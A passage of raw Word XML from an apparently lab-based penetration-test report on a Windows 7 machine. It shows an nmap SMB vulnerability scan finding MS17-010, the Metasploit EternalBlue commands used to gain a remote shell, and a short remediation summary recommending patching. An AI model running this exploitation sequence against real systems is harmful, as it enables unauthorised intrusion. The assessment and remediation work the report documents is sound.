          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>|_  System time: 2024-06-14T18:11:27+01:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52892A53" w14:textId="77777777" w:rsidR="00EE3E4D" w:rsidRDefault="00EE3E4D" w:rsidP="00607540"/>
    <w:p w14:paraId="49A88342" w14:textId="77777777" w:rsidR="002F2A42" w:rsidRDefault="002F2A42" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2A42">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">During our network scan, we identified three open ports: 135, 139, and 445 on the target machine. The target machine has been identified as running Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47438908" w14:textId="18403871" w:rsidR="007E5185" w:rsidRDefault="002F2A42" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2A42">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Since port 445 indicates that SMB (Server Message Block) is active, we can utilize the Nmap Scripting Engine (NSE) to check for potential vulnerabilities related to SMB on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8747E4" w14:textId="77777777" w:rsidR="009E2476" w:rsidRPr="009E2476" w:rsidRDefault="009E2476" w:rsidP="009E2476">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E2476">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nmap --script smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-</w:t>
      </w:r>
      <w:r w:rsidRPr="009E2476">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p445 10.10.10.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AF6CC" w14:textId="77777777" w:rsidR="0061430E" w:rsidRDefault="0061430E" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C5CEAE"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Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-18 10:11 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C96E8BD"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Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B7A7E"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NSE Timing: About 27.27% done; ETC: 10:11 (0:00:13 remaining)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4719D4"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Nmap scan report for 10.10.10.40 (10.10.10.40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B69CA0"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Host is up (0.051s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA39251"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p>
    <w:p w14:paraId="2A3138B8"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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59B818"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445/tcp open  microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F854F9"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p>
    <w:p w14:paraId="12E0AFA6"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Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF28F4"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xml:space="preserve">| smb-vuln-ms17-010: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092F494"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VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BDA6BC" w14:textId="77777777" w:rsidR="007F209A" w:rsidRPr="007F209A" w:rsidRDefault="007F209A" w:rsidP="00694EDE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>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Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B25362" w14:textId="77777777" w:rsidR="007F209A" w:rsidRPr="007F209A" w:rsidRDefault="007F209A" w:rsidP="00694EDE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>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State: VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235D5AE"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IDs:  CVE:CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56535072"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Risk factor: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55421641"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A critical remote code execution vulnerability exists in Microsoft SMBv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CAA95"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servers (ms17-010).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508F057"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xml:space="preserve">|           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F92E1E"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Disclosure date: 2017-03-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B201F"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References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC1C68"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https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9A7EC7"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       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE463A"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|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8DFD0" w14:textId="77777777" w:rsidR="007F209A" w:rsidRPr="007F209A" w:rsidRDefault="007F209A" w:rsidP="007F209A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F209A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>|_smb-vuln-ms10-054: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EDFA4" w14:textId="77777777" w:rsidR="007F209A" w:rsidRPr="007F209A" w:rsidRDefault="007F209A" w:rsidP="007F209A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F209A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714AD0E3" w14:textId="77777777" w:rsidR="00C16200" w:rsidRDefault="00C16200" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0FB2C7" w14:textId="12FBFCD5" w:rsidR="00C16200" w:rsidRPr="002F2A42" w:rsidRDefault="00CC4615" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4615">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Since we know that the machine is vulnerable to the EternalBlue MS17-010 vulnerability, we can utilize Metasploit to search for the appropriate exploit module. By leveraging this exploit, we can potentially gain a remote shell on the machine, allowing us to execute commands and perform further actions remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253415BD" w14:textId="77777777" w:rsidR="00BB6DF9" w:rsidRPr="00BB6DF9" w:rsidRDefault="00BB6DF9" w:rsidP="00BB6DF9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search eternal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32CCC0" w14:textId="77777777" w:rsidR="00BB6DF9" w:rsidRPr="00BB6DF9" w:rsidRDefault="00BB6DF9" w:rsidP="00BB6DF9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5BA76" w14:textId="77777777" w:rsidR="00BB6DF9" w:rsidRPr="00BB6DF9" w:rsidRDefault="00BB6DF9" w:rsidP="00BB6DF9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set RHOSTS &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F4378" w14:textId="77777777" w:rsidR="00BB6DF9" w:rsidRPr="00BB6DF9" w:rsidRDefault="00BB6DF9" w:rsidP="00BB6DF9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set LHOSTS &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C1D13" w14:textId="77777777" w:rsidR="00BB6DF9" w:rsidRPr="00BB6DF9" w:rsidRDefault="00BB6DF9" w:rsidP="00BB6DF9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6DF9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD2C297" w14:textId="77777777" w:rsidR="007E5185" w:rsidRDefault="007E5185" w:rsidP="00607540"/>
    <w:p w14:paraId="5CEE5487" w14:textId="77777777" w:rsidR="00E23078" w:rsidRDefault="00E23078" w:rsidP="00E23078">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB32191" wp14:editId="44BBD47D">
            <wp:extent cx="6711950" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="53068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84830" name="Picture 530684830"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6711950" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="703BAE53" w14:textId="4A9CC888" w:rsidR="00BB6DF9" w:rsidRPr="00E23078" w:rsidRDefault="00E23078" w:rsidP="00E23078">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006E2051">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E23078">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>.Eternal Blue Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B6DA6" w14:textId="77777777" w:rsidR="00122BB3" w:rsidRPr="00607540" w:rsidRDefault="00122BB3" w:rsidP="00607540"/>
    <w:p w14:paraId="306820AD" w14:textId="10237336" w:rsidR="005C19C0" w:rsidRDefault="005C19C0" w:rsidP="005C19C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc169647987"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="711400D9" w14:textId="77777777" w:rsidR="000E1FF9" w:rsidRDefault="000E1FF9" w:rsidP="000E1FF9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CF7C76" w14:textId="0FE6E070" w:rsidR="000E1FF9" w:rsidRDefault="00607540" w:rsidP="000E1FF9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a result of this assessment there are several opportunities </w:t>
      </w:r>
      <w:r w:rsidR="000E1FF9">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t>strengthen the box</w:t>
      </w:r>
      <w:r w:rsidR="00A07FB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00A07FB6">
        <w:t xml:space="preserve"> posture</w:t>
      </w:r>
      <w:r>
        <w:t>. Remediation efforts are prioritized below starting with those that will likely take the least amount of time and effort to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8DA52" w14:textId="77777777" w:rsidR="000E1FF9" w:rsidRDefault="000E1FF9" w:rsidP="000E1FF9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFD2F42" w14:textId="49C9DDAD" w:rsidR="00ED4C76" w:rsidRPr="003014A6" w:rsidRDefault="000E1FF9" w:rsidP="00ED4C76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc169647988"/>
      <w:r w:rsidRPr="003014A6">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Medium Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5EEAAD3D" w14:textId="21D94CCD" w:rsidR="00604A75" w:rsidRPr="00867581" w:rsidRDefault="00ED4C76" w:rsidP="00867581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="003014A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPT-</w:t>
      </w:r>
      <w:r w:rsidRPr="003014A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>002</w:t>
      </w:r>
      <w:r w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00604A75" w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– Perform a network file share audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385E7A5" w14:textId="5037D8BF" w:rsidR="00604A75" w:rsidRPr="00867581" w:rsidRDefault="00604A75" w:rsidP="00867581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="003014A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPT-001</w:t>
      </w:r>
      <w:r w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00860534" w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00867581" w:rsidRPr="00867581">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apply security update and patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB0038" w14:textId="77777777" w:rsidR="00EC7147" w:rsidRPr="00EC7147" w:rsidRDefault="00EC7147" w:rsidP="00EC7147"/>
    <w:p w14:paraId="01B866DA" w14:textId="76B88408" w:rsidR="000E1FF9" w:rsidRDefault="000E1FF9" w:rsidP="000E1FF9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc169647989"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Long Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0DD5475E" w14:textId="51E0CAA3" w:rsidR="00E45C0A" w:rsidRDefault="001444DD" w:rsidP="00E45C0A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Educate systems and network administrators and developers on security hardening best practices compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F85A9A" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D798D94" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E480DCA" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5933DD" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
